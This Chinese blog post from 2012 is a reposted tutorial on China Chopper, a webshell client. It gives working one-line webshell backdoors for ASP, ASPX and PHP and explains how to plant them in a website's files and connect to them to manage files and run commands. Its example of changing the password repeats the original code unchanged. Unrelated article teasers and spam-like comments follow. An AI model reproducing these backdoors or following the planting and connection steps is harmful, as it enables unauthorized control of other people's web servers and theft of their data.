当前位置:首页 > 随笔 > 正文内容

一句话与中国菜刀的用法

光的传人14年前 (2012-11-15)随笔9626

 注:本文转载,仅用来个人学习。

菜刀是用来连一句话的,asp、aspx、php的一句话菜刀都可以连,只是这几种一句话语句不一样。
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass,也就是双引号或者单引号包含着的这部分,比如我想把asp的一句话的密码改成drvfan,那么改完之后就是这样的:
<%eval request(“pass”)%>
其他同理。
要想连一句话,你首先得把这个一句话插入到一个正常的网站文件中,asp的一句话插入到asp文件里,aspx的一句话插入到aspx文件里,php同理。
当然,你也可以把一句话单独写在一个文件里,比如你新建了一个asp.php文件,这个asp.php文件的全部内容就只有一个一句话,也是可以的。
插入了一句话木马,下面就是连接了。
在菜刀主界面,右击,选择“添加”,
在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的可以不用填,
填完之后单击“添加”,就可以了。
添加完毕后,你的这个一句话的shell会显示到菜刀主界面里,鼠标右击它,选择“文件管理”,就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是:<%eval request(“pass”)%>
aspx的一句话是:<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是:<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能,是“虚拟终端”,也是在右键菜单里的,这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令,那么直接输入命令回车就可以看到结果了

扫描二维码推送至手机访问。

版权声明:本文由光的传人博客www.liu16.com发布,如需转载请注明出处。

本文链接:http://www.liu16.com/post/maicaidao.html

标签: 黑客
分享给朋友:

相关文章

好男人PK坏男人

好男人PK坏男人

上文中说到,坏男人的杀伤力比好男人强出N倍!首先,好男人的出手概率要小得多,因为好男人开始追求之前就要考虑负责任的问题,所以不完全中意的不会去追,条件不成熟的目前不能追,对方已有男朋友的不能追,未来前景不看好的不能追,限制极多。而坏男人反正...

2023年山东高考作文二《故事的力量》

2023年山东高考作文二《故事的力量》

从小到大,我们听过无数的故事,它们或许有些已经随着时间的流逝而逐渐淡忘,但也有一些经典的故事依旧在我们的脑海中留下深刻的印象,并影响着我们的成长与思考。故事是一种有力量的表达方式,它可以帮助我们更好地表达和沟通。无论是面对亲密的人还是陌生人...

无效的证书 此网站的证书可能已经过期或者是颁发给其他网站的

无效的证书 此网站的证书可能已经过期或者是颁发给其他网站的

打开所有网站都提示如下图所示怎么办?无效的证书此网站的证书可能已经过期或者是颁发给其他网站的。有人尝试截取你和远程服务器间的数据通讯。请检查地址栏内的网址是否正确。今天解决了这样一个问题,是因为主机时间不正确导致的证书失效。把电脑系统时间调...

安卓之光:小米 11 Ultra正式发布,与相机的拐点之战!

安卓之光:小米 11 Ultra正式发布,与相机的拐点之战!

正在看小米3.29日新品发布会,发现雷军把手机相机做到了相机的水平,他把小米 11定义为安卓机皇,把小米 11 Ultra定义了一个新词:安卓之光!我喜欢这个名字!O(∩_∩)O哈哈~现场雷军跟索尼黑卡m7进行了拍照对比,敢于跟专业相机比较...

HelloWorld——又一款新出的科学上网插件,只可惜试用1天

HelloWorld——又一款新出的科学上网插件,只可惜试用1天

在谷歌应用商店,发现一款新上线的科学上网插件:HelloWorld。官方简介如下:HelloWorld是一款速度最快的海外网站加速插件,可轻松访问google、facebook、twitter、youtube等网站,简单易用的科学上网服务,...

长途汽车坐什么位置最安全?

长途汽车坐什么位置最安全?

每次上车前,我都会想好要坐在什么样的位置才能保证最安全。长途汽车尤其要注意!开长途汽车的司机最容易累,人一累,什么事情就不好说了。出门在外,安全第一!自己总结了个思路,仅仅是个人想法,没有实践过,纯属理论!设想一下,长途汽车一般发生交通意外...

评论列表

空气源
13年前 (2013-04-07)

php的不懂呀!路过支持一下呗

健康使者
13年前 (2012-12-20)

学习了

女装报告
13年前 (2012-12-11)

这是要教我们啥呀?

智能电网
13年前 (2012-12-06)

鸭梨山大,楼主这篇藐似没看懂

长安婚纱摄影
13年前 (2012-11-30)

鸭梨,太有才了!

南阳金巴黎婚纱摄影
14年前 (2012-11-24)

好,顶

奶茶
14年前 (2012-11-22)

菜刀不但是用来切菜还可以做其他很多东西。。。

wordpress博客主机
14年前 (2012-11-21)

学习了

霍致永博客
14年前 (2012-11-20)

这个标题太震撼啦哈哈欢迎来访

快播电影
14年前 (2012-11-20)

看不懂 PHP了,吐血了

李志红博客
14年前 (2012-11-19)

不是很懂,只来看看。

男装
14年前 (2012-11-19)

看了半天,因为不懂,所以还是没有看懂

比分直播
14年前 (2012-11-16)

来学习了,谢谢分享

润初颜
14年前 (2012-11-16)

php的不懂呀!路过支持一下

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。